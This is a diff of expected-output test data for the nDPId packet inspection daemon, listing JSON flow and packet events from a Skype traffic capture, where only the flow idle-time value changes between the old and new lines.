-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1431969689543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689543,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0irdAAEAGZW7AqAEinTfrnMOcnE7UANcrM6a2IoAQECxAVAAAAQEICj4jQsFMWRmA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1431969689596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689596,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIpxDw5oq9Bj82fT\/9aASOJAjJwAAAgQFrAQCCApOp72RPiNCegEDAwk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1431969689596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689596,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EYdAAEAGR47AqAEinTeCrcOanEPZ9P\/1KvQY\/YAQECx51gAAAQEICj4jQvVOp72R"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVDVAAEAGBNHAqAEinTeCsMOdnFaE5icqAAAAALAC\/\/\/EvgAAAgQFtAEDAwUBAQgKPiNGZAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1431969689525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689525,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIpxDw5sesq08OgI9xqASOJCQMAAAAgQFrAQCCApQDL\/UPiNCegEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1431969689525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689525,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n95AAEAGT8XAqAEi1cezjsObnEM6Aj3GHrKtPYAQECznJAAAAQEICj4jQrBQDL\/U"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1431969689543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689543,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxOw5wzprYh1ADXK6ASOJDpcAAAAgQFrAQCCApMWRmAPiNCegEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1431969689543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689543,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0irdAAEAGZW7AqAEinTfrnMOcnE7UANcrM6a2IoAQECxAVAAAAQEICj4jQsFMWRmA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1431969689596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689596,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIpxDw5oq9Bj82fT\/9aASOJAjJwAAAgQFrAQCCApOp72RPiNCegEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1431969689596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689596,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EYdAAEAGR47AqAEinTeCrcOanEPZ9P\/1KvQY\/YAQECx51gAAAQEICj4jQvVOp72R"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVDVAAEAGBNHAqAEinTeCsMOdnFaE5icqAAAAALAC\/\/\/EvgAAAgQFtAEDAwUBAQgKPiNGZAAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoHIAAEARwNrAqAEiQAQXkTLdnFgALcyQnJYCZ5BZSWZ\/iXC28\/gJa4xy6SADRNB7IBe6OkY8K1Ib90nh6Q=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2TSkAAEARlefAqAEinTc4pTLdnFQAIg\/nnJgCnGl25qOBTIS5Gpv0M8FAGs9\/YbWac7o="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1431969690604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969690604,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWw53yBAwphOYnK6ASOJA8uAAAAgQFrAQCCApOpRObPiNGZAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1431969690604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969690604,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+KpAAEAGYGfAqAEinTeCsMOdnFaE5icr8gQMKoAQECyTZwAAAQEICj4jRt9OpROb"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjRAAEAGNtXAqAEinTeCrcOeAbsMd47qAAAAALAC\/\/9tvAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAl7lAAEAGV97AqAEi1cezjsOfAbt1SdybAAAAALAC\/\/9NxgAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWD1AAEAGl9zAqAEinTfrnMOgAbv31LXOAAAAALAC\/\/\/yiAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1431969691145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIgG7w58e2AO\/dUncnKASOJDyJAAAAgQFrAQCCApQDMFlPiNIswEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1431969691145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0teBAAEAGOcPAqAEi1cezjsOfAbt1SdycHtgDwIAQECxJCwAAAQEICj4jSPdQDMFl"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1431969691148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691148,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7w6ATTYBZ99S1z6ASOJDP3gAAAgQFrAQCCApMWRsSPiNIswEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1431969691148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691148,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bg9AAEAGghbAqAEinTfrnMOgAbv31LXPE02AWoAQECwmwwAAAQEICj4jSPlMWRsS"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1431969691204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691204,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIgG7w56D64icDHeO66ASOJAr0QAAAgQFrAQCCApOp78jPiNIswEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1431969691204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691204,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0APxAAEAGWBnAqAEinTeCrcOeAbsMd47rg+uInYAQECyCfgAAAQEICj4jSTBOp78j"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1431969690604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969690604,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWw53yBAwphOYnK6ASOJA8uAAAAgQFrAQCCApOpRObPiNGZAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1431969690604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969690604,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+KpAAEAGYGfAqAEinTeCsMOdnFaE5icr8gQMKoAQECyTZwAAAQEICj4jRt9OpROb"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjRAAEAGNtXAqAEinTeCrcOeAbsMd47qAAAAALAC\/\/9tvAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAl7lAAEAGV97AqAEi1cezjsOfAbt1SdybAAAAALAC\/\/9NxgAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWD1AAEAGl9zAqAEinTfrnMOgAbv31LXOAAAAALAC\/\/\/yiAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1431969691145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIgG7w58e2AO\/dUncnKASOJDyJAAAAgQFrAQCCApQDMFlPiNIswEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1431969691145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0teBAAEAGOcPAqAEi1cezjsOfAbt1SdycHtgDwIAQECxJCwAAAQEICj4jSPdQDMFl"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1431969691148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691148,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7w6ATTYBZ99S1z6ASOJDP3gAAAgQFrAQCCApMWRsSPiNIswEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1431969691148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691148,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bg9AAEAGghbAqAEinTfrnMOgAbv31LXPE02AWoAQECwmwwAAAQEICj4jSPlMWRsS"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1431969691204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691204,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIgG7w56D64icDHeO66ASOJAr0QAAAgQFrAQCCApOp78jPiNIswEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1431969691204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691204,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0APxAAEAGWBnAqAEinTeCrcOeAbsMd47rg+uInYAQECyCfgAAAQEICj4jSTBOp78j"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 